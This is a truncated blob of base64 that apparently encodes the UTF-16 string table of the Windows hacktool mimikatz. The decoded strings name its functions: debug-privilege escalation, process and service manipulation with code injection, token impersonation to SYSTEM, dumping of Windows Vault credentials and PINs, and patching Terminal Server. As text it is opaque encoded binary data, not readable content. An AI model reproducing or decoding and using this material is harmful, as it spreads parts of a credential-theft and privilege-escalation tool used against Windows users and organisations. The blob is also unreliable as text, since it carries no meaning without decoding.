AAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEMAbwBuAG4AZQBjAHQAIAAlADAAOAB4AAoAAAAAAEEAcwBrACAAZABlAGIAdQBnACAAcAByAGkAdgBpAGwAZQBnAGUAAABkAGUAYgB1AGcAAABQAHIAaQB2AGkAbABlAGcAZQAgAG0AbwBkAHUAbABlAAAAAABwAHIAaQB2AGkAbABlAGcAZQAAAFAAcgBpAHYAaQBsAGUAZwBlACAAJwAlAHUAJwAgAE8ASwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBpAHYAaQBsAGUAZwBlAF8AcwBpAG0AcABsAGUAIAA7ACAAUgB0AGwAQQBkAGoAdQBzAHQAUAByAGkAdgBpAGwAZQBnAGUAIAAoACUAdQApACAAJQAwADgAeAAKAAAAUgBlAHMAdQBtAGUAIABhACAAcAByAG8AYwBlAHMAcwAAAAAAcgBlAHMAdQBtAGUAAAAAAFMAdQBzAHAAZQBuAGQAIABhACAAcAByAG8AYwBlAHMAcwAAAHMAdQBzAHAAZQBuAGQAAABUAGUAcgBtAGkAbgBhAHQAZQAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcwB0AG8AcAAAAAAAUwB0AGEAcgB0ACAAYQAgAHAAcgBvAGMAZQBzAHMAAABzAHQAYQByAHQAAABMAGkAcwB0ACAAaQBtAHAAbwByAHQAcwAAAAAAaQBtAHAAbwByAHQAcwAAAEwAaQBzAHQAIABlAHgAcABvAHIAdABzAAAAAABlAHgAcABvAHIAdABzAAAAUAByAG8AYwBlAHMAcwAgAG0AbwBkAHUAbABlAAAAAABUAHIAeQBpAG4AZwAgAHQAbwAgAHMAdABhAHIAdAAgACIAJQBzACIAIAA6ACAAAABPAEsAIAAhACAAKABQAEkARAAgACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBzAHQAYQByAHQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AYwByAGUAYQB0AGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgB0AFQAZQByAG0AaQBuAGEAdABlAFAAcgBvAGMAZQBzAHMAAAAAAE4AdABTAHUAcwBwAGUAbgBkAFAAcgBvAGMAZQBzAHMAAAAAAE4AdABSAGUAcwB1AG0AZQBQAHIAbwBjAGUAcwBzAAAAJQBzACAAbwBmACAAJQB1ACAAUABJAEQAIAA6ACAATwBLACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAG4AZQByAGkAYwBPAHAAZQByAGEAdABpAG8AbgAgADsAIAAlAHMAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAbgBlAHIAaQBjAE8AcABlAHIAYQB0AGkAbwBuACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAAcABpAGQAIAAoAC8AcABpAGQAOgAxADIAMwApACAAaQBzACAAbQBpAHMAcwBpAG4AZwAAACUAdQAJACUAdwBaAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AYwBhAGwAbABiAGEAYwBrAFAAcgBvAGMAZQBzAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAGEAbABsAGIAYQBjAGsAUAByAG8AYwBlAHMAcwAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AbwBwAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAlAHcAWgAAAAAACgAJACUAcAAgAC0APgAgACUAdQAAAAAACQAlAHUAAAAJACAAAAAAAAkAJQBwAAAACQAlAFMAAAAJAC0APgAgACUAUwAAAAAACgAJACUAcAAgAC0APgAgACUAcAAJACUAUwAgACEAIAAAAAAAJQBTAAAAAAAjACUAdQAAAEwAaQBzAHQAIABzAGUAcgB2AGkAYwBlAHMAAABTAGgAdQB0AGQAbwB3AG4AIABzAGUAcgB2AGkAYwBlAAAAAABzAGgAdQB0AGQAbwB3AG4AAAAAAFAAcgBlAHMAaAB1AHQAZABvAHcAbgAgAHMAZQByAHYAaQBjAGUAAABwAHIAZQBzAGgAdQB0AGQAbwB3AG4AAABSAGUAcwB1AG0AZQAgAHMAZQByAHYAaQBjAGUAAAAAAFMAdQBzAHAAZQBuAGQAIABzAGUAcgB2AGkAYwBlAAAAUwB0AG8AcAAgAHMAZQByAHYAaQBjAGUAAAAAAFIAZQBtAG8AdgBlACAAcwBlAHIAdgBpAGMAZQAAAAAAUwB0AGEAcgB0ACAAcwBlAHIAdgBpAGMAZQAAAFMAZQByAHYAaQBjAGUAIABtAG8AZAB1AGwAZQAAAAAAJQBzACAAJwAlAHMAJwAgAHMAZQByAHYAaQBjAGUAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABnAGUAbgBlAHIAaQBjAEYAdQBuAGMAdABpAG8AbgAgADsAIABTAGUAcgB2AGkAYwBlACAAbwBwAGUAcgBhAHQAaQBvAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAEkAbgBqAGUAYwB0ACAAbgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAKAAAAAAAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABzAGUAcgB2AGkAYwBlACAAbgBhAG0AZQAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAABTAHQAYQByAHQAaQBuAGcAAAAAAFIAZQBtAG8AdgBpAG4AZwAAAAAAUwB0AG8AcABwAGkAbgBnAAAAAABTAHUAcwBwAGUAbgBkAGkAbgBnAAAAAABSAGUAcwB1AG0AaQBuAGcAAAAAAFAAcgBlAHMAaAB1AHQAZABvAHcAbgAAAFMAaAB1AHQAZABvAHcAbgAAAAAAcwBlAHIAdgBpAGMAZQBzAC4AZQB4AGUAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAABlAHIAcgBvAHIAIAAlAHUACgAAAE8ASwAhAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBjAHIAZQBhAHQAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAHMAZQByAHYAaQBjAGUAXwBzAGUAbgBkAGMAbwBuAHQAcgBvAGwAXwBpAG4AcAByAG8AYwBlAHMAcwAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAIAB3AGkAdABoAG8AdQB0ACAAUwBjAFMAZQBuAGQAQwBvAG4AdAByAG8AbAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAHMAZQByAHYAaQBjAGUAXwBzAGUAbgBkAGMAbwBuAHQAcgBvAGwAXwBpAG4AcAByAG8AYwBlAHMAcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATQBhAHIAawAgAGEAYgBvAHUAdAAgAFAAdABIAAAAAABtAGEAcgBrAHIAdQBzAHMAAAAAAEMAaABhAG4AZwBlACAAbwByACAAZABpAHMAcABsAGEAeQAgAGMAdQByAHIAZQBuAHQAIABkAGkAcgBlAGMAdABvAHIAeQAAAGMAZAAAAAAARABpAHMAcABsAGEAeQAgAHMAbwBtAGUAIAB2AGUAcgBzAGkAbwBuACAAaQBuAGYAbwByAG0AYQB0AGkAbwBuAHMAAAB2AGUAcgBzAGkAbwBuAAAAAAAAAFMAdwBpAHQAYwBoACAAZgBpAGwAZQAgAG8AdQB0AHAAdQB0AC8AYgBhAHMAZQA2ADQAIABvAHUAdABwAHUAdAAAAAAAYgBhAHMAZQA2ADQAAAAAAAAAAABMAG8AZwAgAG0AaQBtAGkAawBhAHQAegAgAGkAbgBwAHUAdAAvAG8AdQB0AHAAdQB0ACAAdABvACAAZgBpAGwAZQAAAAAAAABTAGwAZQBlAHAAIABhAG4AIABhAG0AbwB1AG4AdAAgAG8AZgAgAG0AaQBsAGwAaQBzAGUAYwBvAG4AZABzAAAAcwBsAGUAZQBwAAAAUABsAGUAYQBzAGUALAAgAG0AYQBrAGUAIABtAGUAIABhACAAYwBvAGYAZgBlAGUAIQAAAGMAbwBmAGYAZQBlAAAAAABBAG4AcwB3AGUAcgAgAHQAbwAgAHQAaABlACAAVQBsAHQAaQBtAGEAdABlACAAUQB1AGUAcwB0AGkAbwBuACAAbwBmACAATABpAGYAZQAsACAAdABoAGUAIABVAG4AaQB2AGUAcgBzAGUALAAgAGEAbgBkACAARQB2AGUAcgB5AHQAaABpAG4AZwAAAGEAbgBzAHcAZQByAAAAAAAAAAAAQwBsAGUAYQByACAAcwBjAHIAZQBlAG4AIAAoAGQAbwBlAHMAbgAnAHQAIAB3AG8AcgBrACAAdwBpAHQAaAAgAHIAZQBkAGkAcgBlAGMAdABpAG8AbgBzACwAIABsAGkAawBlACAAUABzAEUAeABlAGMAKQAAAAAAYwBsAHMAAABRAHUAaQB0ACAAbQBpAG0AaQBrAGEAdAB6AAAAZQB4AGkAdAAAAAAAQgBhAHMAaQBjACAAYwBvAG0AbQBhAG4AZABzACAAKABkAG8AZQBzACAAbgBvAHQAIAByAGUAcQB1AGkAcgBlACAAbQBvAGQAdQBsAGUAIABuAGEAbQBlACkAAABTAHQAYQBuAGQAYQByAGQAIABtAG8AZAB1AGwAZQAAAHMAdABhAG4AZABhAHIAZAAAAAAAQgB5AGUAIQAKAAAANAAyAC4ACgAAAAAACgAgACAAIAAgACgAIAAoAAoAIAAgACAAIAAgACkAIAApAAoAIAAgAC4AXwBfAF8AXwBfAF8ALgAKACAAIAB8ACAAIAAgACAAIAAgAHwAXQAKACAAIABcACAAIAAgACAAIAAgAC8ACgAgACAAIABgAC0ALQAtAC0AJwAKAAAAAABTAGwAZQBlAHAAIAA6ACAAJQB1ACAAbQBzAC4ALgAuACAAAABFAG4AZAAgACEACgAAAAAAbQBpAG0AaQBrAGEAdAB6AC4AbABvAGcAAAAAAFUAcwBpAG4AZwAgACcAJQBzACcAIABmAG8AcgAgAGwAbwBnAGYAaQBsAGUAIAA6ACAAJQBzAAoAAAAAAHQAcgB1AGUAAAAAAGYAYQBsAHMAZQAAAGkAcwBCAGEAcwBlADYANABJAG4AdABlAHIAYwBlAHAAdAAgAHcAYQBzACAAIAAgACAAOgAgACUAcwAKAAAAAABpAHMAQgBhAHMAZQA2ADQASQBuAHQAZQByAGMAZQBwAHQAIABpAHMAIABuAG8AdwAgADoAIAAlAHMACgAAAAAANgA0AAAAAAA4ADYAAAAAAAAAAAAKAG0AaQBtAGkAawBhAHQAegAgADIALgAwACAAYQBsAHAAaABhACAAKABhAHIAYwBoACAAeAA4ADYAKQAKAE4AVAAgACAAIAAgACAALQAgACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgACUAdQAuACUAdQAgAGIAdQBpAGwAZAAgACUAdQAgACgAYQByAGMAaAAgAHgAJQBzACkACgAAAAAAQwB1AHIAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB0AGEAbgBkAGEAcgBkAF8AYwBkACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAGcAZQB0AEMAdQByAHIAZQBuAHQARABpAHIAZQBjAHQAbwByAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgBlAHcAOgAgACUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAdABhAG4AZABhAHIAZABfAGMAZAAgADsAIABTAGUAdABDAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFMAbwByAHIAeQAgAHkAbwB1ACAAZwB1AHkAcwAgAGQAbwBuACcAdAAgAGcAZQB0ACAAaQB0AC4ACgAAAFUAbgBrAG4AbwB3AG4AAABEAGUAbABlAGcAYQB0AGkAbwBuAAAAAABJAG0AcABlAHIAcwBvAG4AYQB0AGkAbwBuAAAASQBkAGUAbgB0AGkAZgBpAGMAYQB0AGkAbwBuAAAAAABBAG4AbwBuAHkAbQBvAHUAcwAAAFIAZQB2AGUAcgB0ACAAdABvACAAcAByAG8AYwBlAHMAIAB0AG8AawBlAG4AAAAAAHIAZQB2AGUAcgB0AAAAAABJAG0AcABlAHIAcwBvAG4AYQB0AGUAIABhACAAdABvAGsAZQBuAAAAZQBsAGUAdgBhAHQAZQAAAEwAaQBzAHQAIABhAGwAbAAgAHQAbwBrAGUAbgBzACAAbwBmACAAdABoAGUAIABzAHkAcwB0AGUAbQAAAEQAaQBzAHAAbABhAHkAIABjAHUAcgByAGUAbgB0ACAAaQBkAGUAbgB0AGkAdAB5AAAAAAB3AGgAbwBhAG0AaQAAAAAAVABvAGsAZQBuACAAbQBhAG4AaQBwAHUAbABhAHQAaQBvAG4AIABtAG8AZAB1AGwAZQAAAHQAbwBrAGUAbgAAACAAKgAgAFAAcgBvAGMAZQBzAHMAIABUAG8AawBlAG4AIAA6ACAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAHcAaABvAGEAbQBpACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAIAAqACAAVABoAHIAZQBhAGQAIABUAG8AawBlAG4AIAAgADoAIAAAAG4AbwAgAHQAbwBrAGUAbgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AdwBoAG8AYQBtAGkAIAA7ACAATwBwAGUAbgBUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAGQAbwBtAGEAaQBuAGEAZABtAGkAbgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlACAAOwAgAGsAdQBsAGwAXwBtAF8AbABvAGMAYQBsAF8AZABvAG0AYQBpAG4AXwB1AHMAZQByAF8AZwBlAHQAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgBTAEkARAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcwB5AHMAdABlAG0AAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAATgBvACAAdQBzAGUAcgBuAGEAbQBlACAAYQB2AGEAaQBsAGEAYgBsAGUAIAB3AGgAZQBuACAAUwBZAFMAVABFAE0ACgAAAFQAbwBrAGUAbgAgAEkAZAAgACAAOgAgACUAdQAKAFUAcwBlAHIAIABuAGEAbQBlACAAOgAgACUAcwAKAFMASQBEACAAbgBhAG0AZQAgACAAOgAgAAAAAAAlAHMAXAAlAHMACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAHQAbwBrAGUAbgBfAGcAZQB0AE4AYQBtAGUARABvAG0AYQBpAG4ARgByAG8AbQBTAEkARAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAGwAbwBjAGEAbABfAGQAbwBtAGEAaQBuAF8AdQBzAGUAcgBfAEMAcgBlAGEAdABlAFcAZQBsAGwASwBuAG8AdwBuAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AcgBlAHYAZQByAHQAIAA7ACAAUwBlAHQAVABoAHIAZQBhAGQAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACUALQAxADAAdQAJAAAAAAAlAHMAXAAlAHMACQAlAHMAAAAAAAkAKAAlADAAMgB1AGcALAAlADAAMgB1AHAAKQAJACUAcwAAACAAKAAlAHMAKQAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAXwBjAGEAbABsAGIAYQBjAGsAIAA7ACAAQwBoAGUAYwBrAFQAbwBrAGUAbgBNAGUAbQBiAGUAcgBzAGgAaQBwACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACUAdQAJAAAAIAAtAD4AIABJAG0AcABlAHIAcwBvAG4AYQB0AGUAZAAgACEACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlAF8AYwBhAGwAbABiAGEAYwBrACAAOwAgAFMAZQB0AFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABwAGEAdABjAGgAIABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAHMAZQByAHYAaQBjAGUAIAB0AG8AIABhAGwAbABvAHcAIABtAHUAbAB0AGkAcABsAGUAcwAgAHUAcwBlAHIAcwAAAG0AdQBsAHQAaQByAGQAcAAAAAAAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIABtAG8AZAB1AGwAZQAAAAAAdABzAAAAAAB0AGUAcgBtAHMAcgB2AC4AZABsAGwAAABUAGUAcgBtAFMAZQByAHYAaQBjAGUAAABkAG8AbQBhAGkAbgBfAGUAeAB0AGUAbgBkAGUAZAAAAGcAZQBuAGUAcgBpAGMAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAAABkAG8AbQBhAGkAbgBfAHYAaQBzAGkAYgBsAGUAXwBwAGEAcwBzAHcAbwByAGQAAABkAG8AbQBhAGkAbgBfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAAAAZABvAG0AYQBpAG4AXwBwAGEAcwBzAHcAbwByAGQAAABnAGUAbgBlAHIAaQBjAAAAQgBpAG8AbQBlAHQAcgBpAGMAAABQAGkAYwB0AHUAcgBlACAAUABhAHMAcwB3AG8AcgBkAAAAAABQAGkAbgAgAEwAbwBnAG8AbgAAAEQAbwBtAGEAaQBuACAARQB4AHQAZQBuAGQAZQBkAAAARABvAG0AYQBpAG4AIABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAAAAAAEQAbwBtAGEAaQBuACAAUABhAHMAcwB3AG8AcgBkAAAAYwByAGUAZAAAAAAAVwBpAG4AZABvAHcAcwAgAFYAYQB1AGwAdAAvAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABtAG8AZAB1AGwAZQAAAHYAYQB1AGwAdAAAAHYAYQB1AGwAdABjAGwAaQAAAAAAVmF1bHRFbnVtZXJhdGVJdGVtVHlwZXMAVmF1bHRFbnVtZXJhdGVWYXVsdHMAAAAAVmF1bHRPcGVuVmF1bHQAAFZhdWx0R2V0SW5mb3JtYXRpb24AVmF1bHRFbnVtZXJhdGVJdGVtcwBWYXVsdENsb3NlVmF1bHQAVmF1bHRGcmVlAAAAVmF1bHRHZXRJdGVtAAAAAAoAVgBhAHUAbAB0ACAAOgAgAAAACQBJAHQAZQBtAHMAIAAoACUAdQApAAoAAAAAAAkAIAAlADIAdQAuAAkAJQBzAAoAAAAAAAkACQBUAHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAACQAJAEwAYQBzAHQAVwByAGkAdAB0AGUAbgAgACAAIAAgACAAOgAgAAAAAAAJAAkARgBsAGEAZwBzACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAKAAAACQAJAFIAZQBzAHMAbwB1AHIAYwBlACAAIAAgACAAIAAgACAAOgAgAAAAAAAJAAkASQBkAGUAbgB0AGkAdAB5ACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAkACQBBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByACAAIAAgADoAIAAAAAAACQAJAFAAcgBvAHAAZQByAHQAeQAgACUAMgB1ACAAIAAgACAAIAA6ACAAAAAJAAkAKgBBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByACoAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAIAA7ACAAVgBhAHUAbAB0AEcAZQB0AEkAdABlAG0ANwAgADoAIAAlADAAOAB4AAAAAAAJAAkAUABhAGMAawBhAGcAZQBTAGkAZAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAIAA7ACAAVgBhAHUAbAB0AEcAZQB0AEkAdABlAG0AOAAgADoAIAAlADAAOAB4AAAAAAAKAAkACQAqACoAKgAgACUAcwAgACoAKgAqAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARQBuAHUAbQBlAHIAYQB0AGUAVgBhAHUAbAB0AHMAIAA6ACAAMAB4ACUAMAA4AHgACgAAAAAACQAJAFUAcwBlAHIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAlAHMAXAAlAHMAAAAAAAAAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFwATABvAGcAbwBuAFUASQBcAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAAAAAABiAGcAUABhAHQAaAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAMgAgADoAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIAAxACAAOgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAFMASQBEACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAEMAbwBuAHYAZQByAHQAUwBpAGQAVABvAFMAdAByAGkAbgBnAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkACAAOgAgACUAMAA4AHgACgAAAAAACQAJAFAAYQBzAHMAdwBvAHIAZAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAJAAkAUABJAE4AIABDAG8AZABlACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADQAaAB1AAoAAAAAAAkACQBCAGEAYwBrAGcAcgBvAHUAbgBkACAAcABhAHQAaAAgADoAIAAlAHMACgAAAAkACQBQAGkAYwB0AHUAcgBlACAAcABhAHMAcwB3AG8AcgBkACAAKABnAHIAaQBkACAAaQBzACAAMQA1ADAAKgAxADAAMAApAAoAAAAJAAkAIABbACUAdQBdACAAAAAAAHAAbwBpAG4AdAAgACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAKQAAAAAAYwBsAG8AYwBrAHcAaQBzAGUAAABhAG4AdABpAGMAbABvAGMAawB3AGkAcwBlAAAAYwBpAHIAYwBsAGUAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQAgADsAIAByACAAPQAgACUAMwB1ACkAIAAtACAAJQBzAAAAAAAAAGwAaQBuAGUAIAAgACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAKQAgAC0APgAgACgAeAAgAD0AIAAlADMAdQAgADsAIAB5ACAAPQAgACUAMwB1ACkAAAAlAHUACgAAAAkACQBQAHIAbwBwAGUAcgB0AHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAJQAuACoAcwBcAAAAJQAuACoAcwAAAAAAdABvAGQAbwAgAD8ACgAAAAkATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAHQAZQBtAHAAIAB2AGEAdQBsAHQAAAAAAAkAUABhAHQAaAAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAACUAaAB1AAAAJQB1AAAAAABbAFQAeQBwAGUAIAAlAHUAXQAgAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvA